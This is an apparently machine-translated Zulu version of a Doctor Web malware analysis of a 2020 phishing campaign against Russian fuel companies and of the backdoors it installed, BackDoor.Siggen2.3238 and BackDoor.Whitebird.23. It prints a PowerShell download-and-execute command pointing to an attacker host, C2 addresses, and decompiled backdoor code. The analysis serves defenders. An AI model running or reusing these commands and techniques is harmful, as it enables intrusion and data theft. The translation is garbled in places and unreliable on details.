Okuhlangenwe nakho kwethu ekuphenyeni izehlakalo zokuphepha zekhompuyutha kubonisa ukuthi i-imeyili isengenye yeziteshi ezivame ukusetshenziswa abahlaseli ukuze bangene kuqala kwingqalasizinda yenethiwekhi ehlaselwe. Isenzo esisodwa sokunganaki esinencwadi esolisayo (noma esingasolisi kangako) siba indawo yokungena ukuze uthole olunye ukutheleleka, yingakho izigebengu ze-inthanethi zisebenzisa ngokunenzuzo izindlela zobunjiniyela bezenhlalo, nakuba zingamazinga ahlukahlukene empumelelo.
Kulokhu okuthunyelwe sifuna ukukhuluma ngophenyo lwethu lwakamuva mayelana nomkhankaso wogaxekile oqondiswe kwinani lezinkampani ze-Russian fuel complex complex. Konke ukuhlasela kulandele isimo esifanayo kusetshenziswa ama-imeyili mbumbulu, futhi akekho obonakale efake umzamo omkhulu kokuqukethwe kulawa ma-imeyili.
Isevisi yezobunhloli
Konke kwaqala ekupheleni kuka-Ephreli 2020, lapho abahlaziyi begciwane le-Doctor Web bethola umkhankaso wogaxekile lapho abaduni bathumela khona uhla lwemibhalo olusha locingo kubasebenzi bezinkampani eziningi endaweni kaphethiloli namandla aseRussia. Yiqiniso, lokhu kwakungewona umbukiso olula wokukhathazeka, njengoba uhla lwemibhalo lwalungelona iqiniso, futhi imibhalo ye-.docx ilande izithombe ezimbili ezinsizeni ezikude.
Enye yazo ilandwe kukhompuyutha yomsebenzisi isuka ezindabeni[.]zannews[.]com server. Kuyaphawuleka ukuthi igama lesizinda lifana nesizinda sesikhungo semidiya esilwa nenkohlakalo saseKazakhstan - zannews[.]kz. Ngakolunye uhlangothi, isizinda esisetshenzisiwe sasikhumbuza ngokushesha omunye umkhankaso wango-2015 owaziwa ngokuthi TOPNEWS, owawusebenzisa i-ICEFOG backdoor futhi wawunezizinda zokulawula iThrojani ezinochungechunge olungaphansi "lwezindaba" emagameni azo. Esinye isici esijabulisayo kwaba ukuthi lapho kuthunyelwa ama-imeyili kubamukeli abahlukene, izicelo zokulanda isithombe zisebenzisa imingcele yesicelo ehlukile noma amagama ezithombe ahlukile.
Sikholelwa ukuthi lokhu kwenziwe ngenjongo yokuqoqa ulwazi ukuze kukhonjwe umuntu obhalelayo βothembekileβ, ozoqinisekiswa ukuthi uzovula incwadi ngesikhathi esifanele. Iphrothokholi ye-SMB yasetshenziswa ukulanda isithombe kuseva yesibili, okwakungenziwa ukuze kuqoqwe amahashi e-NetNTLM kumakhompyutha ezisebenzi ezivule idokhumenti eyamukelwe.
Futhi nansi incwadi ngokwayo enombhalo mbumbulu:
NgoJuni walo nyaka, abagebengu baqale ukusebenzisa igama lesizinda elisha, sports[.]manhajnews[.]com, ukuze balayishe izithombe. Ukuhlaziywa kubonise ukuthi izizinda ezingaphansi ze-manhajnews[.]com zisetshenziswe ekuthunyelweni kogaxekile kusukela okungenani ngoSepthemba 2019. Enye yezinhloso zalo mkhankaso kwakuyinyuvesi enkulu yaseRussia.
Futhi, ngoJuni, abahleli bokuhlasela baqhamuke nombhalo omusha wezincwadi zabo: kulokhu lo mbhalo wawuqukethe ulwazi mayelana nokuthuthukiswa kwemboni. Umbhalo wencwadi wabonisa ngokucacile ukuthi umbhali walo kwakungesona isikhulumi isiRashiya, noma wayedala ngamabomu umbono onjalo ngaye. Ngeshwa, imibono yokuthuthukiswa kwemboni, njengenjwayelo, iphenduke ikhava nje - idokhumenti yaphinda yalanda izithombe ezimbili, kuyilapho iseva yashintshwa ukuze ilandwe[.]inklingpaper[.]com.
Ukuqamba okusha okulandelayo kwalandela ngoJulayi. Emzamweni wokudlula ukutholwa kwemibhalo enonya ngezinhlelo zokulwa namagciwane, abahlaseli baqale ukusebenzisa imibhalo ye-Microsoft Word ebethelwe ngephasiwedi. Ngesikhathi esifanayo, abahlaseli banquma ukusebenzisa indlela yakudala yobunjiniyela bezenhlalo - isaziso somvuzo.
Umbhalo wesikhalazo waphinde wabhalwa ngendlela efanayo, okwavusa izinsolo ezengeziwe phakathi kwalowo owayekhulumelwa. Iseva yokulanda isithombe nayo ayizange ishintshe.
Qaphela ukuthi kuzo zonke izimo, amabhokisi eposi e-elekthronikhi abhaliswe kumeyili[.]ru kanye nesizinda se-yandex[.]ru asetshenziswa ukuthumela izinhlamvu.
Ukuhlasela
Ekuqaleni kukaSepthemba 2020, kwase kuyisikhathi sokwenza okuthile. Abahlaziyi begciwane lethu baqophe igagasi elisha lokuhlasela, lapho abahlaseli baphinde bathumela khona izincwadi ngaphansi kwebhaxa lokuvuselela inkomba yocingo. Kodwa-ke, kulokhu okunamathiselwe bekuqukethe i-macro eyingozi.
Lapho uvula idokhumenti enamathiselwe, i-macro idale amafayela amabili:
- Isikripthi se-VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, ebeyihloselwe ukwethula ifayela lenqwaba;
- Ifayela lenqwaba ngokwalo %APPDATA%configstest.bat, eliye lafiphazwa.
Ingqikithi yomsebenzi wayo yehlela ekwethuleni igobolondo le-Powershell ngamapharamitha athile. Amapharamitha adluliselwe kugobolondo ahlukaniswa abe imiyalo:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ngokulandelayo emiyalweni ethulwayo, isizinda okulayishwa kuso okukhokhelwayo siphinde sicashwe njengesayithi lezindaba. A elula , okuwukuphela komsebenzi wakhe ukuthola i-shellcode kusuka kumyalo kanye neseva yokulawula futhi iyenze. Sikwazile ukuhlonza izinhlobo ezimbili zama-backdoors ezingafakwa ku-PC yesisulu.
I-BackDoor.Siggen2.3238
Esokuqala sithi I-BackDoor.Siggen2.3238 - Ochwepheshe bethu bebengakaze bahlangane ngaphambili, futhi akuzange kukhulunywe ngalolu hlelo ngabanye abathengisi bokuvikela amagciwane.
Lolu hlelo luwumnyango ongemuva obhalwe nge-C++ futhi lusebenza kumasistimu wokusebenza we-Windows angu-32-bit.
I-BackDoor.Siggen2.3238 iyakwazi ukuxhumana neseva yokuphatha isebenzisa amaphrothokholi amabili: i-HTTP ne-HTTPS. Isampula elihloliwe lisebenzisa iphrothokholi ye-HTTPS. Umenzeli Womsebenzisi olandelayo usetshenziswa ezicelweni eziya kuseva:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Kulokhu, zonke izicelo zinikezwa isethi elandelayo yamapharamitha:
%s;type=%s;length=%s;realdata=%send
lapho umugqa ngamunye %s ushintshwa ngokuhambisanayo ngokuthi:
- I-ID yekhompyutha enegciwane,
- uhlobo lwesicelo esithunyelwayo,
- ubude bedatha kunkambu yedatha yangempela,
- idatha.
Esigabeni sokuqoqa ulwazi mayelana nesistimu ethelelekile, i-backdoor ikhiqiza umugqa ofana:
lan=%s;cmpname=%s;username=%s;version=%s;
lapho i-lan iyikheli lasesizindeni se-inthanethi lekhompyutha ethelelekile, i-cmpname igama lekhompyutha, igama lomsebenzisi igama lomsebenzisi, inguqulo umugqa 0.0.4.03.
Lolu lwazi olunesihlonzi se-sysinfo luthunyelwa ngesicelo se-POST kuseva yokulawula etholakala kokuthi https[:]//31.214[.]157.14/log.txt. Uma ephendula I-BackDoor.Siggen2.3238 ithola isignali ye-HEART, uxhumano kuthathwa njengempumelelo, futhi i-backdoor iqala umjikelezo oyinhloko wokuxhumana neseva.
Incazelo egcwele eyengeziwe yezimiso zokusebenza I-BackDoor.Siggen2.3238 isethu .
BackDoor.Whitebird.23
Uhlelo lwesibili ukuguqulwa kwe-BackDoor.Whitebird backdoor, esivele saziwa yithi ngesigameko ne-ejensi kahulumeni e-Kazakhstan. Le nguqulo ibhalwe nge-C++ futhi yakhelwe ukusebenza kuzo zombili izinhlelo zokusebenza ze-Windows 32-bit kanye ne-64-bit.
Njengezinhlelo eziningi zalolu hlobo, BackDoor.Whitebird.23 yakhelwe ukusungula ukuxhumana okubethelwe neseva yokulawula nokulawula okungagunyaziwe kwekhompyutha ethelelekile. Kufakwe kusistimu esengozini kusetshenziswa i-dropper .
Isampula esiyihlolile bekuyilabhulali enobungozi enokuthunyelwa kwamanye amazwe okubili:
- I-Google Play
- Isivivinyo.
Ekuqaleni komsebenzi wayo, isusa ukubethela ukucushwa okufakwe ngokuqinile kumzimba ongemuva usebenzisa i-algorithm esekelwe ekusebenzeni kwe-XOR nge-byte 0x99. Ukucushwa kubukeka kanje:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Ukuqinisekisa ukusebenza kwayo njalo, i-backdoor ishintsha inani elishiwo ensimini amahora_okusebenza ukucupha. Inkambu iqukethe amabhayithi angu-1440, athatha amanani angu-0 noma 1 futhi amele umzuzu ngamunye wehora ngalinye ngosuku. Idala umucu ohlukile wokuxhumana kwenethiwekhi ngayinye elalela isixhumi esibonakalayo futhi ibheka amaphakethe okugunyazwa kuseva elibambayo ekhompyutheni enegciwane. Uma iphakethe elinjalo litholwa, i-backdoor yengeza ulwazi mayelana neseva elibamba ohlwini lwayo. Ngaphezu kwalokho, ihlola ubukhona bommeleli ngeWinAPI I-InternetQueryOptionW.
Uhlelo luhlola iminithi nehora lamanje bese luqhathanisa nedatha esesigangeni amahora_okusebenza ukucupha. Uma inani leminithi elihambisanayo losuku lingeyena uziro, khona-ke uxhumano luyasungulwa neseva yokulawula.
Ukusungula uxhumano kuseva kulingisa ukudalwa koxhumano kusetshenziswa iphrothokholi yenguqulo 1.0 ye-TLS phakathi kweklayenti neseva. Umzimba we-backdoor uqukethe amabhafa amabili.
Ibhafa yokuqala iqukethe iphakethe le-TLS 1.0 Client Hello.
Ibhafa yesibili iqukethe amaphakethe e-TLS 1.0 Okushintshanisa Ukhiye Weklayenti anobude bokhiye obungamabhayithi angu-0x100, Guqula I-Cipher Spec, Umlayezo Wokuxhawula Isandla Obethelwe.
Uma uthumela iphakethe le-Client Hello, i-backdoor ibhala amabhayithi angu-4 esikhathi samanje namabhayithi angu-28 edatha-mbumbulu engahleliwe kunkambu Yeklayenti Okungahleliwe, abalwe ngale ndlela elandelayo:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Iphakethe elitholiwe lithunyelwa kuseva yokulawula. Impendulo (iphakethe le-Server Hello) iyahlola:
- ukuhambisana ne-TLS protocol version 1.0;
- Ukuxhumana kwesitembu sesikhathi (amabhayithi okuqala angu-4 enkambu yephakethe leDatha Engahleliwe) okucaciswe iklayenti kusitembu sesikhathi esishiwo iseva;
- okufanayo kwamabhayithi angu-4 okuqala ngemva kwesitembu sesikhathi kunkambu Yedatha Engahleliwe yeklayenti neseva.
Esimeni sokufanisa okucacisiwe, i-backdoor ilungisa iphakethe Lokushintshanisa Ukhiye Weklayenti. Ukuze wenze lokhu, ilungisa Ukhiye Womphakathi kuphakheji Yokushintshanisa Ukhiye Weklayenti, kanye Nokubethela IV kanye Nedatha Yokubethela Kuphakheji Yomlayezo Obethelwe Ngokuxhawula Isandla.
Umnyango ongemuva ube usuthola iphakethe kumyalo nokulawula iseva, ihlola ukuthi inguqulo yephrothokholi ye-TLS ingu-1.0, bese yamukela amanye amabhayithi angama-54 (umzimba wephakethe). Lokhu kuqeda ukusethwa koxhumano.
Incazelo egcwele eyengeziwe yezimiso zokusebenza BackDoor.Whitebird.23 isethu .
Isiphetho neziphetho
Ukuhlaziywa kwamadokhumenti, uhlelo olungayilungele ikhompuyutha, nengqalasizinda esetshenzisiwe kusivumela ukuthi sisho ngokuzethemba ukuthi ukuhlasela kulungiswe elinye lamaqembu e-Chinese APT. Uma kucatshangelwa ukusebenza kwama-backdoors afakwe kumakhompiyutha ezisulu uma kwenzeka ukuhlaselwa okuphumelelayo, ukutheleleka kuholela, okungenani, ekwebiweni kolwazi oluyimfihlo kumakhompyutha ezinhlangano ezihlaselwe.
Ngaphezu kwalokho, isimo okungenzeka kakhulu ukufakwa kwamaTrojan akhethekile kumaseva endawo anomsebenzi okhethekile. Lezi kungaba izilawuli zesizinda, iziphakeli zemeyili, amasango e-inthanethi, njll. Njengoba singabona esibonelweni , amaseva anjalo anentshisekelo ethile kubahlaseli ngezizathu ezahlukahlukene.
Source: www.habr.com